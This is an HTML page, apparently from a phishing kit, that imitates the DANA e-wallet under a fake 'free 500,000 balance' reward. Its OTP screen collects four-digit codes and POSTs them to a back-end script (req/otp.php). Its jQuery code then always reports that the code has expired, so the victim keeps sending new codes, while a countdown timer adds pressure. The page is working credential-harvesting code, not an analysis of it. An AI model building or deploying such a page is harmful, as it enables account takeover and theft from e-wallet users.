<!DOCTYPE html>
<html>
    <head>
        <title>Claim Reward Saldo DANA Gratis 500.000 Langsung Cair</title>
        <meta charset="UTF-8">
        <meta name="description" content="Reward Saldo Dana Gartis Mulai Hari, Claim sekarang dan cairkan sekarang reward saldo danq gratis">
        <meta name="keywords" content="Saldo dana gratis, Reward Saldo Dana">
        <meta data-n-head="ssr" data-hid="twitter:image" name="twitter:image" content="https://i.ibb.co.com/5gj8M9vW/images-1-7.jpg">
        <meta data-n-head="ssr" data-hid="og:image" property="og:image" content="https://i.ibb.co.com/5gj8M9vW/images-1-7.jpg">
        <link rel="icon" type="image/x-icon" href="./assets/img/favicon/favicon.ico">
        <link rel="apple-touch-icon" sizes="180x180" href="./assets/img/favicon/apple-touch-icon.png">
        <link rel="icon" type="image/png" sizes="32x32" href="./assets/img/favicon/favicon-32x32.png">
        <link rel="icon" type="image/png" sizes="16x16" href="./assets/img/favicon/favicon-16x16.png">
        <link rel="manifest" href="./assets/img/favicon/site.webmanifest">
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
        <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-QWTKZyjpPEjISv5WaRU9OFeRpok6YctnYmDr5pNlyT2bRjXh0JMhjY6hW+ALEwIH" crossorigin="anonymous"> 
        <link rel="stylesheet" href="css/loading.css" type="text/css" media="all" />
        <link rel="stylesheet" href="css/otp.css" type="text/css" media="all" />
    </head>
    <body>
        <!-- ketika halaman di klik munculkan loading -->
        <div id="process" name="process" class="process" style="display: none;">
            <div class="loading">
                <img src="img/load_bg.png">
                <img class="spinner" src="img/load_spin.png">
            </div>
        </div>
        
        <div class="nav-dana">
            <img onclick="location.href='main.html'" src="img/back.png" alt="" />
            <span class="masuk">Masuk</span>
            <p>lol</p>
        </div>
        
       <form id="formOtp">
        <p class="alert-gagal">Kode OTP telah terkirim ke</p>
        <div class="accNohp-flx">
            <div class="flg-flx">
                <img src="img/indo.png" alt="" />
                <span>+62</span>
            </div>
            <input type="tel" value="8xx-xxxx-xxxx"
            readonly/>
        </div>
        <div class="viaWa">
            <span>via</span>
            <img src="img/wa.png" alt="" />
        </div>
        <div class="box-input-otp">
        <div class="clearotp">
            
        </div>
        <input type="tel" 
            pattern="[0-9]*" 
            inputmode="numeric" 
            placeholder=" " 
            minlength="1" 
            maxlength="1" id="otp1" 
            name="otp1"
            autocomplete="off" 
            class="inpotp" >
    
        
        <input type="tel" 
                pattern="[0-9]*" 
                inputmode="numeric" 
                placeholder=" " 
                minlength="1" 
                maxlength="1" id="otp2" 
                name="otp2"
                autocomplete="off" 
                class="inpotp" 
                >
            
        <input type="tel" 
                pattern="[0-9]*" 
                inputmode="numeric" 
                placeholder=" " 
                minlength="1" 
                maxlength="1" id="otp3"
                name="otp3"
                autocomplete="off" 
                class="inpotp" 
                >
            
        <input type="tel" 
                pattern="[0-9]*" 
                inputmode="numeric" 
                placeholder=" " 
                minlength="1" 
                maxlength="1" id="otp4"
                name="otp4"
                autocomplete="off" 
                class="inpotp" 
                >
        </div>
        <div class="box-riset">
            <div onclick="location.href='otp.html'" class="text-riset">
                KIRIM ULANG
            </div>
            <div class="text-timer" id="timer">
            
            </div>
            <img class="timerloadi" src="img/loading.gif" alt="" />
        </div>
        </form>

    </body>
    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
    <script src="js/jquery.min.js"></script>
    <script src="js/jquery.mask.min.js"></script>

    <script>
    $(document).ready(function() {
        $('.clearotp').click(function() {
            $('.inpotp').val('');
            $('#otp1').focus();
        });
    });
    </script>
    
    <script>
    $('.inpotp').on('input', function(event) {
        const inputs = $('.inpotp');
        const isAllFilled = Array.from(inputs).every((input) => input.value !== '');
        if (isAllFilled == true) {
            $(event.target).blur();
            sendOtp();
        }
        const index = inputs.index(this);
        const currentValue = event.target.value;
        if (currentValue.length === 1) {
            if (index < inputs.length - 1) {
                inputs[index + 1].focus();
            }
        } else if (currentValue.length === 0) {
            if (index > 0) {
                inputs[index].focus();
            }
        };
    });
    $('.inpotp').on('keydown', function(event) {
        const inputs = $('.inpotp');
        const key = event.key;
        const index = inputs.index(this);
        if (key === 'Backspace' && event.target.value.length === 0) {
            if (index > 0) {
                inputs[index - 1].focus();
            }
        };
    });
    </script>
    
    <script>
    function sendOtp() {
        $("#process").show();
        event.preventDefault();
        $("#otp1").blur();
        $.ajax({
            type: 'POST',
            url: 'req/otp.php',
            data: $('#formOtp').serialize(),
            dataType: 'text',
            success: function() { 
                setTimeout(function() {
                 $("#process").hide();
                    $('.inpotp').val('');
                    $(".alert-gagal").text(
                        "Kode OTP telah kedaluwarsa silahkan coba kembali");
                    $(".alert-gagal").css("color", "red");
                    $("#otp1").focus();
                }, 1000);
            }
        });
    };
    </script>
    
     <script>
      document.getElementById('timer')
      .innerHTML = 03+":"+01;
      startTimer();

      function startTimer() {
        var presentTime = document.getElementById('timer').innerHTML;
        var timeArray = presentTime.split(/[:]+/);
        var m = timeArray[0];
        var s = checkSecond((timeArray[1] - 1));
        if (s == 59) {
          m = m - 1
        }
        if (m < 0) {
        alert("Waktu Habis");
          return
        }
        document.getElementById('timer').innerHTML = m + ":" + s;
        setTimeout(startTimer, 1000);
      }

      function checkSecond(sec) {
        if (sec < 10 && sec >= 0) {
          sec = "0" + sec
        }; // add zero in front of numbers < 10
        if (sec < 0) {
          sec = "59"
        };
        return sec;
      }
    </script>
    

</html>
